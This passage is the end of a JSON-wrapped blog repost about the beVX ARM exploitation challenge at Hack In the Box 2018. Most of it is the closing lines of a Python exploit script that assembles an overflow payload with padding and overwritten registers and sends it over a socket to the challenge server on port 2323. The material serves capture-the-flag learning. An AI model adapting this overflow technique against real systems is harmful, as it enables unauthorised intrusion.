class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-61\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00x68&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\"># this will make it crash, used to check register values<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-63\"><span class=\"crayon-v\">n<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">128<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">38<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-64\"><span class=\"crayon-c\">#print \"LEFT \", n # how much shell code space left<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-65\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-66\"><span class=\"crayon-v\">tous<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"Belong to us!\\x00\"<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-67\"><span class=\"crayon-v\">padding1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"B\"<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tous<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-69\"><span class=\"crayon-v\">padding2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"A\"<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-70\"><span class=\"crayon-v\">pl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ch1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ch2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">tous<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padding1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padding2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">r2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-71\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-72\"><span class=\"crayon-c\">#this will make sure we can encode\/decode the string as UTF-8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-73\"><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"IS OK \"<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decode<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">\"utf-8\"<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">\"utf-8\"<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-e\">pl<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-74\"><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"Sending payload \\n\"<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">pl<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-76\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create_connection<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2323<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-77\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-79\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">recv<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3694\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Fri, 22 Jun 2018 11:30:44 +0000<\/strong><\/p>\n<p>During the event of Hack In the Box, we launched an ARM reverse engineering and exploitation challenge and gave the attendees the chance to win great prizes. 
The challenge was divided into two parts, a file &#8211; can be downloaded from here: https:\/\/www.beyondsecurity.com\/bevxcon\/bevx-challenge-10 &#8211; that you had to download and reverse engineer and server that &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3694\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">beVX Conference Challenge \u2013 HiTB<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10756],"class_list":["post-12656","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-conferences"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12656"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12656\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}